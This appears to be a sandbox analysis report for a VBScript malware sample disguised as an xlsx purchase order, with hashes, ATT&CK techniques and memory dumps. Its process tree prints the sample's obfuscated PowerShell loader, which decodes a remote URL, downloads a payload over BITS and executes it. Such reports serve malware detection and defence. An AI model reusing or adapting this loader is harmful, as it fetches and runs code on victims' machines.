13b54ea4298feb69555acd6dec7f8f20768411dfa1f9e040a9a90497e5959f92

General

Target

PO-7100062 xlsx.vbs
Size

40KB
MD5

352760d0c749c43f655d83aed8197db7
SHA1

6e88ba7ed23563e930ae52a975a6d3164c114943
SHA256

87cf48968b5c898324b399e1a241cc90ace231a1ba340387a373b4720198af82
SHA512

b3a0cc6e7d9c9eabf5c2a56bc45fe991f053297c235f891faa3e312061a45ae7ecd758f887dac850e25e3d2aec1075b8596a0c256c65bb01c1c1842e517880dd
SSDEEP

768:corMtwTVlHPwlR5EQi/Got7Vg4oOGmXpkzAiPhZeSC0GCG8x:coQqPwN6GoFV+VmZkkiDer7Ox

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5084	powershell.exe
5084	powershell.exe
2588	powershell.exe
2588	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 5084	2020	WScript.exe	83
PID 2020 wrote to memory of 5084	2020	WScript.exe	83
PID 5084 wrote to memory of 2588	5084	powershell.exe	86
PID 5084 wrote to memory of 2588	5084	powershell.exe	86
PID 5084 wrote to memory of 2588	5084	powershell.exe	86

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO-7100062 xlsx.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Beost9 ([String]$Glend){For($Hvidglden=4; $Hvidglden -lt $Glend.Length-1; $Hvidglden+=(4+1)){$Jord=$Glend.Substring( $Hvidglden, 1);$luftfa+=$Jord};$luftfa;}$Bankb=Beost9 'AdduhConftCocitschip Sod:Benz/Deca/DisfsSievtKetceToldpGrubh BebeNymanBundmTiltiInduc AnthEstiaRedeeOverl SynsNearmCephimonttGevrhMono.StamcyamsoDehgmMuni/IschwPalipPret-VintiSchenPhlecUnrulPianu misd Genedvers Sti/FickaStresSpers vksePerit SnisOffe/ WarP EnduGloor EvopSign.LeukabasssVocoiEuph ';$luftfa01=Beost9 'Chemi OveeIdolxGenu ';$Pakvogn = Beost9 ' apt\ComesForeynonssPickwReoroDaadwSati6Jord4 Afd\EjerWironiTradn nondBarooOogrwTartsAnteP Mato EvawbeleeFirerJacoSRanihEnereAlonlDiosl Vir\TentvRets1slyn. bor0Cano\ OrdpscufoSyntwCataeAfskrCrissTakshPatae BnflFacal Brn.BruneSadaxRespePost ';.($luftfa01) (Beost9 'Joyp$ KopUEnteaSterfSkimsSleetDekltVandeFuncl Tal2Prst=Sacr$Ritue ParnFlitvJobb:Egnsw DefiFlagn Aded TveiWizarShad ') ;.($luftfa01) (Beost9 'Skif$RecePFakeaMedlkLaguvWateoTidsgSocin Fim= Int$BackUProjalavsfMetes GentKvaltscomeSletl Com2Vero+Ship$ groP legaposskMastvInheoJohngIndbnIdem ') ;.($luftfa01) (Beost9 'Gale$ FreGSinurZizzoIntouVild Lill= Cyk Nema( Gul(CampgLillwRefomColliBonn Egoiw ReliMetancomm3Chan2Yndl_ParapPararKjeloGrssc BeseEralsAgurs Ter Nonf- HjoFAdff PhysPSabbrMorpoHypecSpkkeCiphsLicks henIFemddValg=Enun$Kros{PoetP FlaISexuDSvei}Tret)Hotp.bilpCArteoPolym UnpmBetwaGustn WredWaggLKartipresnFleceResc) Sil Udpo- ModsPrecpPerilSvamiMinitDera Dri[SkemcSelrh Stia Repr swi]beer3Vati4Aste ');.($luftfa01) (Beost9 'Spol$ graPBaadlFirmaSomnyFlleeunlirUnsespumpdUnpr Bala=Adre Devo$vejrGBaasrUnisoWatcuCaco[Cond$ DobGprocrSkruo caruResh. milc Revo IriuSkumnUriatEden-Supe2Miss] Tou ');.($luftfa01) (Beost9 'Unsa$MeteYBreaaSandkDsnakMetaipetrnBesogMeti=shut( FalTUndee CrusIndttBree-EvolPfaksaPesttCollhTuri Tota$ perPPocka KlakTeltv Calofjerg KonnBoom)Unde unde-ChoaAKorrnBokad sti Tele(Clin[KirkIAfrenOutst RitPOvertTranr Thr]Cast:Bios:Sarcs StaiPasszPrehePate Forr-CyaneReglqPoli Pres8Rumm)Unen ') ;if ($Yakking) {.$Pakvogn $Playersd;} else {;$luftfa00=Beost9 'BlokSRiddtUnhua UndrSubtt Tan-NdskBUdstiPaaptTvansSamfT OpbrpliraHubrncozesNuzzfDrawe ColrLyso Unbe-VaarSGlotoGeryuAnnerNomicAutoeStvn Stig$fortBForhaOutdnNonfk Toob Dir Tjen-AlliDAnskeOutosForst Keri OplnCardaVerdt Puli SteoApprnNeij Oper$ForsUValeawoodfIsbjs Spot UnhtForneOverlPost2Over ';.($luftfa01) (Beost9 ' Sup$PhysUJeopabenkfForesAllet FintEnkeeSqualTrif2 Ver=Prin$HelmeDatinRevavGent:DirraHundpretspLretdIndgaBlomtPriaanonr ') ;.($luftfa01) (Beost9 'MesoIDeutmBaadp Haeo ForrRosatArge-RadiMCompoGraad Diau PholcirceIndf SemaBSystiPrimtComms SubTCowgrCircaKirknHjopsSnipf OveeSkolrDrik ') ;$Uafsttel2=$Uafsttel2+'\Videresen.Rek';while (-not $Bevidsthed170) {.($luftfa01) (Beost9 'Teph$paadBTekseStvlvSdebi VoddTelesUdsttNedkhTvaneNonfdOrga1Bugg7Mono0Jasp=Skip(NigeTEtere EctsStuntAngi-SkylPStemaDiamtFibrhKild Fol$unitURiteaShadfVingsMetrtStrit EgeeAlaclCena2Pala)Inve ') ;.($luftfa01) $luftfa00;.($luftfa01) (Beost9 'TyphSBehntRinga FilrFraftKoen-UntrSGoldlUrtieGsteeundepJern Outl5Ramp ');}.($luftfa01) (Beost9 'Anvi$ TauBCeleebrugoThees ErotHype Afg=Amag TresGTraneVelftObst-UnreCDailoUngonOrietJerneUnovnTuritTrlb Impo$FestUFunla helf UnmsRieht RuntVitae Brul Fis2Selv ');.($luftfa01) (Beost9 'Debu$ PapCScrio GjoiKamprBundsEquirpinshMemb Unde= Sur Fll[OverSDetryTidssPrsetVodkeBandm Eng.AzonCPostoAukjnHugovciffeGattrbetatVejt]Felt:Jvnh: SubFhvedrSkovoDybtmKultBAnglaHords urieAvic6Fict4UnreSJubltTabirSpidiStornForsgInds(Hove$GrafBEthiePreao StisPolyt Bef)Rege ');.($luftfa01) (Beost9 ' Scr$groul NaauFritfvexitGodsf DreaTabe2Fagd Mar= sel Smad[TeneSBrndyDemisSucktCenteLizbm Skr.FlydTVociePorcxRosatTour.UigeE FornSacrc DedoFoeldKondiSinunphocgKamp]Morf:Chif:PostANeglS skaCSeroIthegIappr.SubgG ReleOffetForeS BritKrnkrDelaiKirsnOutbgKnap(jepp$ DisCDuddo gafiSpler SpesLegerTilbhKurs)Benv ');.($luftfa01) (Beost9 ' Brn$NatiOSeksvModseThirrBrssm Difasammg lbetwarb= Evo$hjeml MiduFilmf PaatSkamfRebeaAlli2Vert.JapasSwatuMastbVerisSvaltGranr LonitabonCamegfuld(Opka2Deri5 Sca8Apos6Sent1 Tem5 Bor,Udgi2Spir7 Sig1Synk6Chop2Haan)Marx ');.($luftfa01) $Overmagt;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Beost9 ([String]$Glend){For($Hvidglden=4; $Hvidglden -lt $Glend.Length-1; $Hvidglden+=(4+1)){$Jord=$Glend.Substring( $Hvidglden, 1);$luftfa+=$Jord};$luftfa;}$Bankb=Beost9 'AdduhConftCocitschip Sod:Benz/Deca/DisfsSievtKetceToldpGrubh BebeNymanBundmTiltiInduc AnthEstiaRedeeOverl SynsNearmCephimonttGevrhMono.StamcyamsoDehgmMuni/IschwPalipPret-VintiSchenPhlecUnrulPianu misd Genedvers Sti/FickaStresSpers vksePerit SnisOffe/ WarP EnduGloor EvopSign.LeukabasssVocoiEuph ';$luftfa01=Beost9 'Chemi OveeIdolxGenu ';$Pakvogn = Beost9 ' apt\ComesForeynonssPickwReoroDaadwSati6Jord4 Afd\EjerWironiTradn nondBarooOogrwTartsAnteP Mato EvawbeleeFirerJacoSRanihEnereAlonlDiosl Vir\TentvRets1slyn. bor0Cano\ OrdpscufoSyntwCataeAfskrCrissTakshPatae BnflFacal Brn.BruneSadaxRespePost ';.($luftfa01) (Beost9 'Joyp$ KopUEnteaSterfSkimsSleetDekltVandeFuncl Tal2Prst=Sacr$Ritue ParnFlitvJobb:Egnsw DefiFlagn Aded TveiWizarShad ') ;.($luftfa01) (Beost9 'Skif$RecePFakeaMedlkLaguvWateoTidsgSocin Fim= Int$BackUProjalavsfMetes GentKvaltscomeSletl Com2Vero+Ship$ groP legaposskMastvInheoJohngIndbnIdem ') ;.($luftfa01) (Beost9 'Gale$ FreGSinurZizzoIntouVild Lill= Cyk Nema( Gul(CampgLillwRefomColliBonn Egoiw ReliMetancomm3Chan2Yndl_ParapPararKjeloGrssc BeseEralsAgurs Ter Nonf- HjoFAdff PhysPSabbrMorpoHypecSpkkeCiphsLicks henIFemddValg=Enun$Kros{PoetP FlaISexuDSvei}Tret)Hotp.bilpCArteoPolym UnpmBetwaGustn WredWaggLKartipresnFleceResc) Sil Udpo- ModsPrecpPerilSvamiMinitDera Dri[SkemcSelrh Stia Repr swi]beer3Vati4Aste ');.($luftfa01) (Beost9 'Spol$ graPBaadlFirmaSomnyFlleeunlirUnsespumpdUnpr Bala=Adre Devo$vejrGBaasrUnisoWatcuCaco[Cond$ DobGprocrSkruo caruResh. milc Revo IriuSkumnUriatEden-Supe2Miss] Tou ');.($luftfa01) (Beost9 'Unsa$MeteYBreaaSandkDsnakMetaipetrnBesogMeti=shut( FalTUndee CrusIndttBree-EvolPfaksaPesttCollhTuri Tota$ perPPocka KlakTeltv Calofjerg KonnBoom)Unde unde-ChoaAKorrnBokad sti Tele(Clin[KirkIAfrenOutst RitPOvertTranr Thr]Cast:Bios:Sarcs StaiPasszPrehePate Forr-CyaneReglqPoli Pres8Rumm)Unen ') ;if ($Yakking) {.$Pakvogn $Playersd;} else {;$luftfa00=Beost9 'BlokSRiddtUnhua UndrSubtt Tan-NdskBUdstiPaaptTvansSamfT OpbrpliraHubrncozesNuzzfDrawe ColrLyso Unbe-VaarSGlotoGeryuAnnerNomicAutoeStvn Stig$fortBForhaOutdnNonfk Toob Dir Tjen-AlliDAnskeOutosForst Keri OplnCardaVerdt Puli SteoApprnNeij Oper$ForsUValeawoodfIsbjs Spot UnhtForneOverlPost2Over ';.($luftfa01) (Beost9 ' Sup$PhysUJeopabenkfForesAllet FintEnkeeSqualTrif2 Ver=Prin$HelmeDatinRevavGent:DirraHundpretspLretdIndgaBlomtPriaanonr ') ;.($luftfa01) (Beost9 'MesoIDeutmBaadp Haeo ForrRosatArge-RadiMCompoGraad Diau PholcirceIndf SemaBSystiPrimtComms SubTCowgrCircaKirknHjopsSnipf OveeSkolrDrik ') ;$Uafsttel2=$Uafsttel2+'\Videresen.Rek';while (-not $Bevidsthed170) {.($luftfa01) (Beost9 'Teph$paadBTekseStvlvSdebi VoddTelesUdsttNedkhTvaneNonfdOrga1Bugg7Mono0Jasp=Skip(NigeTEtere EctsStuntAngi-SkylPStemaDiamtFibrhKild Fol$unitURiteaShadfVingsMetrtStrit EgeeAlaclCena2Pala)Inve ') ;.($luftfa01) $luftfa00;.($luftfa01) (Beost9 'TyphSBehntRinga FilrFraftKoen-UntrSGoldlUrtieGsteeundepJern Outl5Ramp ');}.($luftfa01) (Beost9 'Anvi$ TauBCeleebrugoThees ErotHype Afg=Amag TresGTraneVelftObst-UnreCDailoUngonOrietJerneUnovnTuritTrlb Impo$FestUFunla helf UnmsRieht RuntVitae Brul Fis2Selv ');.($luftfa01) (Beost9 'Debu$ PapCScrio GjoiKamprBundsEquirpinshMemb Unde= Sur Fll[OverSDetryTidssPrsetVodkeBandm Eng.AzonCPostoAukjnHugovciffeGattrbetatVejt]Felt:Jvnh: SubFhvedrSkovoDybtmKultBAnglaHords urieAvic6Fict4UnreSJubltTabirSpidiStornForsgInds(Hove$GrafBEthiePreao StisPolyt Bef)Rege ');.($luftfa01) (Beost9 ' Scr$groul NaauFritfvexitGodsf DreaTabe2Fagd Mar= sel Smad[TeneSBrndyDemisSucktCenteLizbm Skr.FlydTVociePorcxRosatTour.UigeE FornSacrc DedoFoeldKondiSinunphocgKamp]Morf:Chif:PostANeglS skaCSeroIthegIappr.SubgG ReleOffetForeS BritKrnkrDelaiKirsnOutbgKnap(jepp$ DisCDuddo gafiSpler SpesLegerTilbhKurs)Benv ');.($luftfa01) (Beost9 ' Brn$NatiOSeksvModseThirrBrssm Difasammg lbetwarb= Evo$hjeml MiduFilmf PaatSkamfRebeaAlli2Vert.JapasSwatuMastbVerisSvaltGranr LonitabonCamegfuld(Opka2Deri5 Sca8Apos6Sent1 Tem5 Bor,Udgi2Spir7 Sig1Synk6Chop2Haan)Marx ');.($luftfa01) $Overmagt;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqhkai1z.f00.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2588-38-0x00000000077E0000-0x0000000007802000-memory.dmp

Filesize
136KB

Download
memory/2588-41-0x0000000007C10000-0x0000000007C24000-memory.dmp

Filesize
80KB

Download
memory/2588-45-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Filesize
64KB

Download
memory/2588-44-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Filesize
64KB

Download
memory/2588-32-0x00000000065C0000-0x00000000065DE000-memory.dmp

Filesize
120KB

Download
memory/2588-14-0x0000000074CE0000-0x0000000075490000-memory.dmp

Filesize
7.7MB

Download
memory/2588-15-0x0000000002CB0000-0x0000000002CE6000-memory.dmp

Filesize
216KB

Download
memory/2588-16-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

Filesize
64KB

Download
memory/2588-17-0x0000000005850000-0x0000000005E78000-memory.dmp

Filesize
6.2MB

Download
memory/2588-18-0x00000000056F0000-0x0000000005712000-memory.dmp

Filesize
136KB

Download
memory/2588-19-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/2588-20-0x0000000005F60000-0x0000000005FC6000-memory.dmp

Filesize
408KB

Download
memory/2588-42-0x0000000074CE0000-0x0000000075490000-memory.dmp

Filesize
7.7MB

Download
memory/2588-30-0x00000000060D0000-0x0000000006424000-memory.dmp

Filesize
3.3MB

Download
memory/2588-40-0x0000000007B90000-0x0000000007BB2000-memory.dmp

Filesize
136KB

Download
memory/2588-33-0x0000000006600000-0x000000000664C000-memory.dmp

Filesize
304KB

Download
memory/2588-39-0x0000000008A60000-0x0000000009004000-memory.dmp

Filesize
5.6MB

Download
memory/2588-35-0x0000000007E30000-0x00000000084AA000-memory.dmp

Filesize
6.5MB

Download
memory/2588-36-0x0000000006B60000-0x0000000006B7A000-memory.dmp

Filesize
104KB

Download
memory/2588-37-0x0000000007850000-0x00000000078E6000-memory.dmp

Filesize
600KB

Download
memory/5084-0-0x000001D43A560000-0x000001D43A582000-memory.dmp

Filesize
136KB

Download
memory/5084-34-0x000001D420660000-0x000001D420670000-memory.dmp

Filesize
64KB

Download
memory/5084-13-0x000001D420660000-0x000001D420670000-memory.dmp

Filesize
64KB

Download
memory/5084-31-0x00007FF9335A0000-0x00007FF934061000-memory.dmp

Filesize
10.8MB

Download
memory/5084-10-0x00007FF9335A0000-0x00007FF934061000-memory.dmp

Filesize
10.8MB

Download
memory/5084-43-0x000001D43A690000-0x000001D43A7DE000-memory.dmp

Filesize
1.3MB

Download
memory/5084-12-0x000001D420660000-0x000001D420670000-memory.dmp

Filesize
64KB

Download
memory/5084-11-0x000001D420660000-0x000001D420670000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing